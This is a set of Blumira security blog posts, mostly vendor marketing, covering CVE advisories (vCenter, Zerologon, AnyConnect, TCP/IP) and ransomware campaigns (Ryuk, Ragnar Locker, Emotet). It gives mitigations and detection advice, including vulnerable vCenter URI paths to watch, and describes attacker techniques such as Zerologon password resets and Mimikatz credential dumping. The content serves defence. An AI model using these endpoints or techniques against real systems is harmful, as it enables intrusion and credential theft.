Query our API for “tags=CVE-2021-21972” for relevant indicators and source IP addresses. #threatintel https://t.co/AcSZ40U5Gp
— Bad Packets (@bad_packets) February 24, 2021
What Should I Do?
Make sure no vCenter assets are directly exposed to the internet; if they are, sever that access and triage those hosts for indications of compromise. If not directly exposed to the internet, prioritize patching quickly because a locally networked device could be used to exploit internal hosts. It only takes one phishing email for an actor to breach the perimeter.
Your options are ordered from most complete in remediation, to more temporary measures:
Option 1:
Apply the patch according to your version.
Option 2:
Employ a workaround to disable the vulnerable location on the server. Here are instructions on how to do that, from VMware’s knowledge base: https://kb.vmware.com/s/article/82374
Option 3:
Use network firewalls to restrict access on port 443 to trusted hosts only.
How to Detect
Watch for unusual access to vCenter hosts on port 443; if possible, target requests for the URI paths:
/ui/vropspluginui/rest/services/
/ui/vropspluginui/rest/services/uploadova
For further technical details, see:
https://swarm.ptsecurity.com/unauth-rce-vmware/
Critical
What Happened
When CVE-2020-1472 was released on Aug 11, 2020, Microsoft addressed a critical remote code execution vulnerability targeting how the Netlogon secure channel is used. This patch is being released in two separate parts. On Aug 11, the patch addressed the initial deployment that covered:
- Fixing the vulnerability for all Windows domain-joined devices.
- Begin logging events for all non-compliant devices.
- Introduced the option to enable protection for all domain-joined devices as well as explicit exceptions via group policy.
The second half of this deployment will take place beginning with the February 9 security update. During this update, the DC (domain controller) enforcement mode will be enabled by default on all devices.
What That Means
The Remote Code Execution category of vulnerabilities are almost always critical priority, especially those that need no authentication. The Netlogon Remote Protocol (MS-NRPC) is used by AD (Active Directory) domains and includes an authentication method as well as the ability to create a Netlogon secure channel. The exploit takes advantage of this authentication and allows the escalation of privileges. The attacker can impersonate the machine account and set a known or empty password for the account.
This attack can be used to obtain full domain administrator privileges, specifically with the spoofing of the domain controller computer account, leading to a full compromise of the domain. There are several proof of concepts out for this attack currently.
What You Should Do
There are four steps recommended by Microsoft as well as changes we’ve made to help:
- Update your domain controllers with the patch that was released on August 11. (And keep your DCs and all Windows hosts up to date otherwise)
- Find which devices are making vulnerable connections by monitoring event logs (Blumira can help with this part!!) See how we integrate with Microsoft Windows Server.
- Address the non-compliant devices
- Enable DC enforcement mode if all non-compliant devices have been addressed prior to Feb 9
From within Blumira, as long as domain controllers are sending System event logs, you can select the global report named “Netlogon Secure Channel Connections” to see if there are any impacted devices still using the insecure channels. We’ve also created a High-Priority Risk finding called “Netlogon Secure Channel Connection Vulnerability Detected.”
Who’s Impacted
Any Windows Server 2012 and above devices are impacted.
Additional Resources:
- Microsoft Update Guide: Netlogon Elevation of Privilege Vulnerability
- Microsoft Support: How to Manage Changes in Netlogon Secure Channel Connections
- CVE-2020-1472: MITRE
To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity. Download our Guide to Microsoft Security.
Low
Blumira wanted to begin the year with a recap of how last year looked regarding the number of detections across our customers’ networks. The detections (findings, as we call them around here) found in this list are the findings we don’t consider to be operational. If we were to include our customer-specific operational findings to this list, account lockouts would take the number one spot, easily!
The goal of this article is to show our readers what we’re seeing on the attack surface. Some of the detections in this list are as simple as alerting on critical alerts from various data sources such as antivirus products, firewalls, etc., while others are very complex in their nature, relying on counting, timings, and a ton of regex (fun stuff).
Start detecting threats in minutes with Blumira Free SIEM.
Without further ado, here are the top 10 detections we saw in 2020 based off of how many findings they triggered across the Blumira customer base.
Public to Private Recon in Individual Connections
This Finding indicates an attacker is attempting to enumerate services that are exposed to the internet. As this only matches when traffic is allowed, this means that either the firewall is set up to allow all traffic, or, the source attacker has found services that are allowed through the firewall and may be leveraged further.
Anomalous Honeypot Access
This indicates that you have an endpoint that is actively attempting to gain information about a honeypot and is likely unaware of its nature. When a honeypot detection occurs, unless the host is a known actor, the source should be acted upon immediately.
Regsvr32 Malicious DLL
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls. It can also be used to specifically bypass process allowlisting. Malicious activity or users may take advantage of this functionality to avoid being detected by endpoint solutions because of allowlists or false positives from Windows using regsvr32.exe for normal operations.
2FA (Two-Factor) Authentication Outside of U.S.
Self-explanatory detection here. We often employ customer allowlists to cut down on false-positives caused by remote workers. Whether we’ve detected a user unexpectedly out of the country or a malicious user that gained some sort of access to a username, this finding has been very helpful and highly accurate.
Potentially Malicious Executable File
We lean heavily on endpoint security for this one. Our goal here was to bridge the gap between as many next-generation endpoint solutions as possible. We alert on high-confidence alerts from most of these endpoint solutions with this single detection.
Internal Password Spraying
When you see this finding, our best security practice recommendation is to go figure out what’s going on as soon as possible. This detection alerts our customers that a single endpoint is attempting to spray the network with random passwords. If one of these random password authentication attempts is successful, it can lead to endpoint compromise, privilege escalation, etc.
Anomalous Server Path Access
This often indicates that an attacker is attempting to enumerate paths across an internal host, in an attempt to find vulnerable or interesting objects on the server. The thresholds for this detection generally avoid scanning bots, however, in some cases, this detection may trigger bots scanning for known-shells sitting on hosts already. In case of these detections and not targeted attacks, they should be broadly blocked where possible, e.g., if from China, block Chinese traffic.
Administrator-Level Account Addition
This one in particular can be considered an operational finding that I was attempting to leave off of this list, but it’s not a daily finding your organization should be seeing. When this event occurs, you should think of this as a “sound the alarms” moment where you should be dropping everything to verify with the source user that this administrative-level account addition was expected. Sometimes it’s not a malicious action, rather an accidental one which would still warrant action on the account.
Null Session Activity
This alert identifies when a single device is contacting multiple devices anonymously to administrative shares. This is usually a tactic used in information gathering prior to an attack. We recommend tracking down {client_ip} and seeing if this is normal activity or disabling the access for this device. We also recommend disabling null sessions whenever possible – here’s guidance on how to disable null sessions in Windows.
25 Windows Account Lockouts in 12 hours
This event has historically been a direct result of Password Spraying like we saw above. Unless you have a very large network, this detection is a rare false positive. This should be correlated with the source machine performing the logins.
Prioritizing Key Security Findings to Reduce Noise
You may notice half of these detections are sourced from the internet. We don’t alert on every scan from the outside world by default, rather, we find a ton of value in letting our customers know when there appears to be a sophisticated reconnaissance attempt or attack happening against their network. If we were to alert on all scanning from the internet, there would be hundreds of findings a day for each one of our customers. One of Blumira’s top priorities with detections is to be accurate and discreet. If a customer is interested in seeing scanning from the network, we have no problem putting a detection rule together, but we inherently don’t prefer to deploy that detection by default.
We have caught many talented penetration testers and hackers using most of these Top 10 detections. Although they may be some of the most triggered findings, our Internal Password Spraying and Anomalous Access detections seem to be an attacker’s worst nightmare. We have heard firsthand from red teams that they’ve never seen some of these findings on previous penetration tests, whether a SIEM solution was present or not.
These remarks are what keep our Incident Detection Engineering team going. We in the Blue team world know that the Red team as well as attackers have the upper hand in this fight against network exploitation, but with Blumira deployed, you can rest easy knowing our detections can catch early stage attacks.
Test it out yourself with a free trial of Blumira’s cloud SIEM.
Critical
Last week, Cisco disclosed a zero-day vulnerability (CVE-2020-3556) that has proof-of-concept exploit code publicly available. It affects their AnyConnect Secure Mobility Client software, an endpoint tool that connects users to enterprise networks via virtual private network (VPN). The vulnerability was reported by Gerbert Roitburd from Secure Mobile Networking Lab (TU Darmstadt).
How It Works
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client allows for an authenticated and local attacker to execute malicious scripts via a targeted user.
Due to lack of authentication to the IPC listener, an attacker could exploit this vulnerability by sending IPC messages to the AnyConnect client IPC listener – resulting in script execution with the privileges of a targeted AnyConnect user, according to Cisco.
For successful exploitation, an attacker would need valid user credentials of the system running the AnyConnect client. They would also need to log into the system during an active AnyConnect session, and gain access to privileges to execute code on that system.
Who is Affected
CVE-2020-3556 affects the AnyConnect Secure Mobility Client for Linux, MacOS, and Windows if they have Bypass Downloader set to its default value of false.
You can verify your Bypass Downloader configuration by opening AnyConnectLocalPolicy.xml file and searching for <BypassDownloader>false</BypassDownloader>
If your Bypass Downloader is set to true, the device is not affected by this vulnerability, according to Cisco.
This vulnerability doesn’t affect the AnyConnect client for Apple iOS or Android.
Mitigation for CVE-2020-3556
There are currently no software updates available to address the AnyConnect zero-day, CVE-2020-3556. Cisco plans to fix this vulnerability in a future release of Cisco AnyConnect Secure Mobility Client software.
Additional Resources
Cisco’s Security Advisory for CVE-2020-3556
AnyConnect Integration
Blumira’s cloud SIEM integrates easily with Cisco AnyConnect to start detecting threats immediately and automating response. Learn more about Blumira’s Cisco AnyConnect integration (logs delivered through ASA firewall & FTD Firepower Threat Defense).
Get a free 14-day trial and deploy in hours to realize value right away:
Medium
A joint cybersecurity advisory (PDF) was released last week by U.S. agencies informing the healthcare and public health sector of recent ransomware activity (also known as CISA Alert AA20-302A).
In their advisory, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) caution that attackers are targeting the healthcare organization with malware that results in ransomware infection, data theft and disruption of service. They express particular concern for healthcare organizations dealing with cyberthreats during the COVID-19 pandemic, and provide information to help them combat these risks.
It’s Happening: Widespread Ryuk Ransomware Attacks
In September, a Fortune 500 healthcare and hospital services provider, Universal Health Services (UHS) was hit by a Ryuk ransomware attack (BleepingComputer). The disruption caused a shutdown of their business operations and IT infrastructure to contain ransomware spread across their network.
Last week, a medical center in Oregon, a New York-based health system, a Brooklyn hospital and several hospitals within a Vermont health network were hit by Ryuk ransomware. BleepingComputer cites Mandiant’s attribution to a Eastern European hacking group that plans to attack hundreds of other hospitals, while KrebsonSecurity reported on tip that they intend to deploy ransomware at more than 400 other U.S.-based healthcare facilities.
A Closer Look at Ryuk Ransomware
First seen in 2018, Ryuk ransomware infections have been observed as steadily rising since July of this year, attacking 20 organizations per week (Check Point). In 2020, Ryuk is responsible for one-third of all ransomware incidents so far this year, according to statistics from SonicWall’s Capture Labs.
According to the advisory, ransomware attackers will use robust and dual-purpose tools like Cobalt Strike and PowerShell Empire to steal credentials. Cobalt Strike is software that was created for adversary simulations and red team operations, normally used for penetration test engagements – but has also been seen in use for malicious purposes, according to Blumira’s Sr. Incident Detection Engineer Amanda Berlin in Analysis of a Threat: PowerShell Malicious Activity.
Using Mimikatz, a Windows attack tool, this allows them to dump cleartext passwords or hash values from memory. With stolen credentials, attackers can move laterally and map your network to understand the scope of ransomware infection.
From an approach perspective, attackers are using Living off the Land (LotL) techniques to infect healthcare networks. That means that rather than leveraging zero-day exploits, they’re using tools or features that already exist in a target environment to conduct malicious activity. I wrote more about this topic in March – see Top Security Threats: Detecting Ransomware Tactics.
Attackers are leveraging native Windows tools like net view and net computer to locate mapped network shares, domain controllers and active directory. To move laterally, attackers are also relying on native tools, such as PowerShell, Windows Management Instrumentation (WMI) and Remote Desktop Protocol (RDP).
This shows that attackers are not using different or more advanced methods, but rather the same tactics, techniques and procedures (TTPs) that we’ve seen prove to be effective for evading detection and ransomware infection.
Ryuk Ransomware Infection Chain
The advisory details the steps of ransomware infection as follows:
- Attackers send out loaders through phishing campaigns that link to malicious websites or attach the malware to an email message (like TrickBot, BazarLoader or BazarBackdoor)
- Then, loaders distribute the payload, deploy and execute the backdoor from a command & control (C2) server
- Finally, they install malware and/or ransomware on a victim’s machine
Click to EnlargeRyuk Ransomware Loaders & Indicators of Compromise
Attackers are leveraging TrickBot tools to deploy ransomware like Ryuk and Conti, and conduct a variety of other malicious activities, including credential harvesting; mail and point-of-sale data exfiltration; and cryptomining.
The FBI reported on new TrickBot modules named Anchor – attackers use anchor_dns, a tool to send and receive stolen data. Anchor evades network defense solutions, blending malicious communications in with legitimate DNS (Domain Name System) traffic by using DNS tunneling.
Attackers have also been seen using BazarLoader/BazarBackdoor. They work together to infect and communicate with the same C2 infrastructure – it’s now one of the most commonly used vectors for ransomware deployment, according to the advisory.
The advisory has detailed code and examples of file, directory and module names to look out for when it comes to TrickBot, BazarLoader and BazarBackdoor. Mandiant also released a list of domains and internet addresses used by a Ryuk threat actor group in previous attacks.
Best Security Practices: Securing Networks From Ryuk Ransomware
U.S. government agencies are advising healthcare organizations to secure their networks by:
- Install patches as soon as updates are released, especially for Windows servers
- Use multi-factor authentication everywhere possible, especially for access to critical applications or services
- Disable the use of remote access or RDP ports and monitor remote access and RDP logs
- Identify open ports and mediate any unnecessary ones
- Audit user accounts with administrative privileges and use the principle of least privilege when configuring access controls
- Audit logs for new account creation to ensure they’re legitimate
Other preparatory actions to take include:
- Prepare network lockdown protocols
- Review incident response plans – maintain copies of data and servers in a separate, secure location
- Identify and back up critical servers, medical records, and infrastructure – keep backups offline from the network
- Set up strategies for redirecting patients in the event of a disruptive attack
- Conduct employee (end user) awareness training on how phishing and ransomware are delivered
Detecting & Responding to Ryuk Ransomware Early
Early detection of attacker tactics and techniques can help you prevent a ransomware infection. Blumira automates detection and response for ransomware prevention and detection by:
Reconnaissance Scanning – By detecting scanning tools on your network, Blumira can identify and alert you to an attacker early in the stages of an attack, before ransomware infection.
Credential Attacks – Blumira detects RDP connections, password spraying, brute-force and more to alert you to attackers attempting to gain access to your network to install ransomware.
Privilege Escalation – Blumira detects whenever administrator-level accounts are added or permissions are changed to alert you to attackers changing privileges in order to move laterally throughout your environment with malicious intent. Blumira can also monitor and alert on account creation.
Data Exfiltration – Attackers are stealing data before infection to use as leverage for demanding a ransom – to prevent data exposure, Blumira detects data exfiltration and any anomalous internal web traffic indicating an attempt to exfiltrate data out of your environment.
Malicious Applications and Files – Blumira detects and notifies your team when an application drops a new file or script on a machine, so you can respond quickly to block or contain malicious executables related to ransomware.
Watch a demo to find out how or contact us to learn more. You can also sign up for a free account of Blumira’s platform to detect and respond to threats in Microsoft 365.
Critical
In a recent advisory (PDF) issued by the U.S. National Security Agency (NSA), they caution that state-sponsored hackers are actively exploiting 25 different vulnerabilities in attacks against National Security Systems (NSS), the U.S. Defense Industrial Base (DIB), and the Department of Defense (DoD) information networks.
Attackers are exploiting Windows vulnerabilities for lateral movement and credential access, attempting to get access in order to move throughout your network and identify data to steal or systems to disrupt. Two vulnerabilities in particular were called out by the NSA as used by state-sponsored attackers, CVE-2020-1472 and CVE-2019-1040.
Critical Windows Vulnerability, ZeroLogon Netlogon: CVE-2020-1472
CVE-2020-1472 is one of the actively exploited vulnerabilities listed in the NSA advisory, rated as critical in security severity rating from Microsoft and ranking 10/10 on the CVSS scale (Common Vulnerability Scoring System).
Due to a flaw in the implementation of the Netlogon protocol encryption, anyone on a network can elevate their privileges to domain administrator. An attacker can establish a vulnerable Netlogon secure channel connection to a domain controller. That allows an attacker to gain access to your entire domain, enabling them to steal data, disrupt your network, deploy malware or ransomware, etc.
Zerologon Mitigation
This vulnerability affects Microsoft Windows Server 2008 – 2019. To mitigate, you should install the patch as soon as you’re able to, and implement additional instructions found in Microsoft’s support article (KB4557222).
Microsoft has planned a two-part phased rollout of Windows updates for mitigation – the first is to help protect Windows devices, as released in early August. The second phase will be released in Q1 2021 to enforce all devices (including non-Windows) to use more secure protocols with Netlogon secure channel. Microsoft’s security advisory for CVE-2020-1472 provides links to security updates and an FAQ on their plan.
CVE-2019-1040: Windows NTLM Vulnerability
A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. That means the attacker can downgrade Windows NTLM security features.
A man-in-the-middle (MitM) attack is when an attacker intercepts communications between two parties either to secretly eavesdrop or modify traffic traveling between the two (CSOOnline).
CVE-2019-1040 Mitigation
This vulnerability affects Microsoft Windows 7 – 10 and Microsoft Windows Server 2008 – 2019. The NSA advisory lists the additional mitigation option of limiting the use of NTLM as much as possible, and stopping the use of NTLMv1. Microsoft’s security advisory for CVE-2019-1040 provides resources on the specific security updates you need, and documentation on reducing the use of NTLM.
Detection & Response for Windows Security
Blumira’s cloud SIEM platform integrates with Microsoft’s Active Directory, Microsoft Windows Server, Microsoft Windows DNS, Microsoft Windows PowerShell and more.
Once integrated, Microsoft security event logs and alerts are streamed to Blumira’s platform, collecting and centralizing event information about users and computers to identify suspicious or threat-like events. Blumira correlates the data with known threats and detection rules, prioritizing alerts sent to your team with security playbooks to help guide you through incident response procedures.
A few examples of Active Directory detections include user behavioral analytics, password spraying, rogue domain administration and much more. Our integration with Active Directory is also commonly used for audit purposes defined in common compliance frameworks such as PCI DSS and NIST 800-171.
Want to Learn More?
Join us this Thursday! Patrick Garrity, VP of Ops at Blumira and Jacob Julian, Solutions Engineer at Blumira will discuss Windows security and best practices, and give a demo of how you can use Blumira to easily detect and respond to Windows security incidents.
In this roundtable discussion, you’ll learn about:
- The basics of a Microsoft cloud security stack
- Windows security detections and best practices
- Office 365 and Azure security threats you should be able to detect
This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.
RSVP to save your seat!
Download Your Guide to Microsoft Security
To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.
In this guide, you’ll learn:
- How to use built-in Windows tools like System Monitor for advanced visibility into Windows server logs
- How to configure Group Policy Objects (GPOs) to give you a deeper look into your Windows environment
- Free, pre-configured tools from Blumira you can use to easily automate Windows logging to enhance detection & response
- What indicators of security threats you should be able to detect for Microsoft Azure and Office 365
Medium
Ransomware continues to strike businesses and governments globally, showing no signs of slowing down during the pandemic. In a recent report by Check Point, researchers found that the daily average of ransomware attacks have increased by 50% in the last three months.
2020 Ransomware Trends
While much of the focus is on the encryption aspect of ransomware, they’ve found that attackers are now exfiltrating large volumes of data before encrypting databases. Attackers are threatening to publish the data if their ransom demands aren’t met.
Emotet and Ryuk Ransomware Infection
This coincides with the rise of Emotet malware delivered through new phishing campaigns seen a few months ago, acting as a backdoor to download and execute payloads on a victim’s systems. Emotet has been linked to both TrickBot, an advanced malware affecting Windows machines, as well as Ryuk ransomware, a type of crypto-ransomware targeting enterprises. According to Check Point, Ryuk ransomware infections have been steadily rising since July 2020, attacking 20 organizations per week.
Learn more in Detect and Protect Against the Return of Emotet Malware.
Microsoft recently announced that they have “cut off key infrastructure” to disrupt new Trickbot infections and activations. The malware has been distributed widely through phishing campaigns leveraging current events as email topics, such as Black Lives Matters and COVID-19. According to The Washington Post, Microsoft won a court order to seize U.S.-based servers controlling a botnet, or network of computers infected by Trickbot. But Trickbot continues to operate on servers outside of the country, according to threat intelligence company Intel 471.
Paying Ransom May Result in OFAC Violations & Fines
According to the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC), demand for ransomware payments has only increased during the pandemic due to attackers targeting systems that people rely on to continue conducting business online. The FBI reports a 147% annual increase in ransomware-associated losses from 2018 to 2019 (Internet Crime Report PDF).
OFAC issued a recent advisory (PDF) this month that cautions any companies that pay ransomware ransoms may be at risk of violating OFAC regulations – and subject to monetary fines. Their reasons include: any transaction with criminals could be used to fund illicit activity counter to U.S. national security; payments embolden attackers; and paying a ransom doesn’t always guarantee victims will regain access to stolen data.
Detecting Indicators of a Ransomware Attack
Identifying the different stages of an attack that can lead to ransomware infection is important to enable your team to detect attackers early and remediate incidents faster. As outlined in the MITRE ATT&CK framework, Blumira detects and alerts you to key attacker techniques/tactics used for initial access, credential access, execution, persistence, privilege escalation, lateral movement, exfiltration and more.
Below are attacks that can lead to a ransomware attack that Blumira detects, alerts and can help guide your team through incident response procedures:
Reconnaissance Scanning
Attack Stage: Discovery
In the early stages of an attack, an attacker is conducting reconnaissance during the discovery phase as they get to know your network, systems and applications better to help them understand how to launch an attack effectively. By detecting internal port scanning tools, Blumira can help alert you to an indicator of an internal attacker looking for vulnerable areas to attack and move laterally throughout your environment.
RDP Connections
Attack Stage: Initial Access
Remote Desktop Protocol (RDP) is one of the top ways that remote attackers gain initial access to install ransomware. RDP is often used by businesses to allow users to remotely access files and applications on their local network. But when RDP ports are left open to the internet, it can allow anyone to access remote servers.
Blumira detects and alerts you to public IPs connecting to your internal network via RDP for early detection of malicious activity that can lead to ransomware infection.
Password Spraying
Attack Stage: Credential Access (Brute Force)
Password spraying is when an attacker attempts to authenticate to your network or applications by typing in multiple usernames paired with a single password. It’s used by attackers to discover weak passwords that can be used to move laterally throughout your environment, while targeting systems and data with ransomware. Blumira can detect and alert you to password spraying, as well as provide security playbooks for step-by-step remediation.
Learn more in How to Test Your SIEM for Password Spraying.
Account Lockouts
Attack Stage: Credential Access (Brute Force)
Account lockouts can be the result of too many failed login attempts, potentially due to a forgotten password or malicious brute-force attack to gain entry to your systems to install ransomware. Blumira can detect common account lockouts, as well as two-factor authentication account lockouts. We also provide next steps for internal incident response procedures, such as blocklisting source IPs and reviewing your authentication logs.
Rouge Domain Admin Account Created
Attack Stage: Privilege Escalation
To get greater access privileges, attackers may attempt to create domain administrator accounts that allow them to deploy ransomware broadly across all servers, databases, storage systems, etc. Blumira can detect when a rogue domain admin account is created and notify you to disable it immediately.
Data Exfiltration
Attack Stage: Exfiltration
Attackers are stealing data before ransomware infection to use as additional leverage for demanding money from victim organizations. Blumira detects data exfiltration via generic network protocols to alert you to an attacker’s actions. Our service also detects anomalous internal web traffic that may indicate attempts to exfiltrate data out of your environment.
Application Executable or Script (Dropping Malware or Ransomware)
Attack Stage: Execution
Attackers download and execute malicious files in order to install ransomware on your systems. Blumira detects when an application is dropping a new file or script onto a machine and notifies your team of potentially malicious executables that may not be allow-listed, and could present a threat to your organization. This visibility allows you to detect a ransomware attack early and respond quickly to block or contain it.
Best Security Practices to Help Defend Against Ransomware
Here are a few best security practices to help prevent, detect and respond to the many security events that can lead to ransomware infection:
Access Control – Practice least privilege by limiting access to applications and services to only those that need access to do their jobs.
Two-Factor Authentication – Add an additional layer of security to every login with a secondary authentication method (preferably a secure one that uses push notifications and an authenticator app, not SMS).
Secure Ports – RDP ports should never be allowed from public IP addresses, or left open to the internet. SMB (Server Message Block) connections should also not be allowed from public IPs, as they can allow attacks like EternalBlue (an SMB exploit) to occur, resulting in ransomware infection.
Backups – Back up your system separately, both locally and offsite, and keep copies in the cloud for redundancy.
Patch – Patch as frequently as you’re able to in order to protect against vulnerabilities and exploits used to gain initial access and install ransomware on your systems.
User Awareness – Create a culture of security and regularly train users to spot phishing attacks and protect against downloading malicious attachments, a popular avenue for ransomware infection.
Threat Detection – Faster detection leads to faster response times, which is key to detecting early attack indicators and ultimately, preventing ransomware infection. Learn more about automating detection and response with Blumira’s security platform, and how Blumira can help you prevent and detect ransomware infection.
Ransomware Roundtable
Join our ransomware roundtable this Thursday for a discussion of how to prevent and detect ransomware-related threats today.
Critical
Microsoft has released 11 Critical level patches during this Patch Tuesday (including the latest Adobe Flash security update). However, two of these vulnerabilities among those being patched seem to be a familiar type of attack as what we saw in 2013 when MS patched a bug in Windows’ TCP/IP driver. In that case, it was referred to as the “Ping of Death” vulnerability.
How It Works
The vulnerability lies in the way ICMP packets are handled by the TCP/IP stack when the IPv6 Recursive DNS option is used. As the team at Sophos states:
There is a logic flaw in tcpip.sys that can be exploited by crafting a router advertisement packet containing more data than expected, which results in the driver putting more bytes of data on its memory stack than provided for in the driver’s code, resulting in a buffer overflow. In theory, this could be used for both denial of service and remote code execution attacks. But in practice, achieving remote code execution would be extremely difficult.
At this point in time, there have been no known exploitations of this vulnerability, only proof of concept testing.
Who’s Affected & Mitigation
All Windows 10 version operating systems, as well as Windows Server 2019 and above are affected by this exploit
Mitigation for CVE-2020-16898/9
The proper and recommended mitigation for these vulnerabilities would be to apply the Microsoft Security Patches offered for affected devices yesterday October 13, 2020.
Workaround:
You can disable ICMPv6 RDNSS, to prevent attackers from exploiting the vulnerability, with the PowerShell command below. This workaround is only available for Windows 1709 and above.
netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Note: No reboot is needed after making the change.
More Resources
- Microsoft CVE-2020-16898 | Windows TCP/IP Remote Code Execution Vulnerability
- Sophos: Top Reason to Apply October 2020’s Microsoft Patches – Ping of Death Redux
- GitHub: CVE-2020-16898
Download Your Guide to Microsoft Security
To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.
In this guide, you’ll learn:
- How to use built-in Windows tools like System Monitor for advanced visibility into Windows server logs
- How to configure Group Policy Objects (GPOs) to give you a deeper look into your Windows environment
- Free, pre-configured tools from Blumira you can use to easily automate Windows logging to enhance detection & response
- What indicators of security threats you should be able to detect for Microsoft Azure and Office 365
Medium
A recent ransomware attack has hit a corporate travel agency that provides services to Fortune 500 and other companies, demanding $4 million in Bitcoin as ransom.
Researcher @JAMESWT shared a malware sample used against CWT (formerly Carlson Wagonlit Travel), according to Threatpost. The ransomware was identified as Ragnar Locker, used previously to attack Energias de Portugal (EDP), demanding $11 million in Bitcoin as ransom.
First spotted in December 2019, Ragnar Locker is known for targeting corporate entities, performing reconnaissance or discovery research on a network/target before executing the ransomware. It uses a variety of different techniques, including:
- Attacking Windows Remote Desktop Protocol (RDP) connections to gain a foothold in networks
- Exploiting managed service providers’ remote management software for network access, like ConnectWise and Kaseya
- Gaining administrator-level access to domains
- Using native Windows administrative tools like PowerShell and Windows Group Policy Objects (GPO) for lateral movement to Windows clients and servers
(Source: Sophos)
The method of using legitimate and already-existing tools within a target’s environment to execute attacks is known as Living-off-the-Land. The use of these tactics and tools results in clever evasion and bypassing of security software detection.
Securing Against RDP Ransomware Risks
RDP is one of the most common ways attackers install ransomware on systems, as can be seen in recent attacks on the major Japanese car manufacturer Honda and an Argentinian energy distributor – learn more in RDP Risk: Ransomware Targets Manufacturing and Energy Plants.
At Blumira, we saw an 85% increase in RDP attacks against our honeypots over time since December 2019 through April 2020 as many organizations quickly shifted to remote-only work during the COVID-19 pandemic.
As can be found in the above post, Blumira recommends that:
- RDP should never be internet-facing, as it is not a secure method of remote management.
- RDP is generally not secure without configuring Network Level Authentication (NLA) and other similar protections.
Remote access should flow through a proper virtual private network (VPN) connection protected by two-factor authentication (2FA). - Limit how many users are granted RDP access and give access only to specific IPs. Follow least privilege principles (see tips on Group Policy Management).
Windows Security Log Resources to Protect Against Ransomware
With many organizations of varying sizes running Windows shops, they are easily a target of ransomware attacks like Ragnar Locker that leverage built-in tools to move laterally and install malware in their network.
To help any organization easily increase their visibility into Windows security logs for better threat detection and response, Blumira is offering a free set of pre-configured Windows policy settings available on Github.
Sr. Incident Response Engineer Amanda Berlin created Logmira to help organizations quickly import GPO settings into their environment. She has also provided many other Windows how-tos, tutorials and on-demand webinars to help security and IT teams:
- Logmira: Windows Logging Policies for Better Threat Detection
- How to Enable Sysmon for Windows Logging and Security
- Intro to Windows Security Logs – On-Demand Webinar
- Windows Logging Tips for Better Threat Detection – On-Demand Webinar
In one of the articles she’s written, she covers a real-life detection by Blumira’s platform within a customer’s environment, a PowerShell execution bypass attempt that is used by attackers to execute code on systems without administrative access. As mentioned earlier, threat actors behind the Ragnar Locker ransomware attacks leverage common Windows tools like PowerShell and GPO to move laterally to Windows clients and servers.
In this case, the PowerShell execution policy bypass finding was linked to files from a popular hacking tool called Cobalt Strike, a type of software typically used by red team operations but sometimes also seen in use for malicious purposes. A particular part of the application was used – the part that can execute PowerShell scripts, download files and spawn other payloads, according to Berlin.
In Blumira’s platform, we provide playbooks on next steps. In this case, we recommended that the organization remove the device from the network if possible and start internal incident response procedures. We also recommend auditing the device, paying closer attention to PowerShell commands executed by examining any logs around the time of the event. See more in Analysis of a Threat: PowerShell Malicious Activity.
Blumira’s cloud SIEM platform provides both automated threat detection and actionable response for organizations of any size. We detect and provide playbooks for a number of findings related to the entire chain of ransomware infection – from indicators of attacker reconnaissance (like scanning) to lateral movement and unauthorized or anomalous access activity, as well as any malware, ransomware and data exfiltration that would indicate a breach in progress.
Learn more about our product and schedule a demo today.
Medium
One of the most active malware threats in the past few years, Emotet (also referred to as Heodo or Geodo), has been recently seen in new phishing spam campaigns, after a five-month pause in activity. When it was initially spotted in 2014, it acted as a botnet that stole banking credentials. Now used as a backdoor, Emotet loads third-party payloads and modules used for spam, stealing credentials, email harvesting and spreading across local networks, according to Proofpoint researchers.
Researchers have observed Emotet installing a Trojan known as TrickBot, a type of advanced malware that infects Windows machines. TrickBot can download modules that attempt to spread laterally through your network, steal Active Directory databases, harvest login credentials from browsers, steal RDP (Remote Desktop Protocol) credentials and OpenSSH keys and more, according to BleepingComputer.
It has also been known to allow attackers access to infected networks, enabling them to install certain types of ransomware by opening up a reverse shell. Emotet has been noted as an initial entry point linked to the eventual infection of the Ryuk ransomware, often a few weeks later in the infection chain. This indicates different attackers may be collaborating on techniques to move throughout victims’ environments. Ryuk is a type of crypto-ransomware first discovered in August 2018, targeting enterprises while asking for large Bitcoin ransom payments, according to Malwarebytes.
Prevent and detect security threats before they result in ransomware infection with Blumira’s automated threat detection & response.
Learn more about Ransomware Prevention & Detection >
How Does Emotet Spread?
Like many other types of ransomware and malware, Emotet typically begins with a phishing email sent to a user, with the most common subjects referring to transactions, payments or invoices. The email body content similarly refers to missed or upcoming payments and financial statements, conveying a sense of urgency and importance as all good phishing emails do. Finally, Microsoft Word document attachments with macros and malicious URLs contain downloaders that attempt to download the Emotet payload.
According to SiliconAngle, campaigns also involve a malicious Microsoft Office document that presents an Office 365 error to the user. After the user approves running the macros, the code launches PowerShell to retrieve Emotet from a compromised site.
The use of legitimate, existing tools in a Windows environment like PowerShell is known as a Living-off-the-Land technique that attackers employ to evade common detection tools and hide their activity. PowerShell accounted for 22% of all dual-use tools used as malware downloaders, according to a Symantec analysis, with Windows Management Instrumentation (WMI) and the command line tool as the three top tools used by attackers for malicious means.
Back in April, Blumira’s security team detected a PowerShell execution policy bypass attempt, which we detailed in Analysis of a Threat: PowerShell Malicious Activity. Our on-demand webinar, Windows Logging Tips for Better Threat Detection also gives you some free guidance on getting visibility into your Windows environment.
How To Detect Emotet
To detect and protect against malware like Emotet, organizations can use email security technology like Proofpoint Advanced Threat Protection to help detect known threats, malicious attachments and unsafe URLs (specifically, with Proofpoint Targeted Attack Protection). Or, use a sandbox security platform like Palo Alto Networks Wildfire that integrates with your next-generation firewall to detect and analyze known or unknown attacks, including malware.
Other security tools you could use for an additional layer of defense, according to Blumira’s Director of Security Mike Behrmann, include cloud-based, next-generation antivirus (NGAV) that can help you identify threats faster based on behavioral detection.
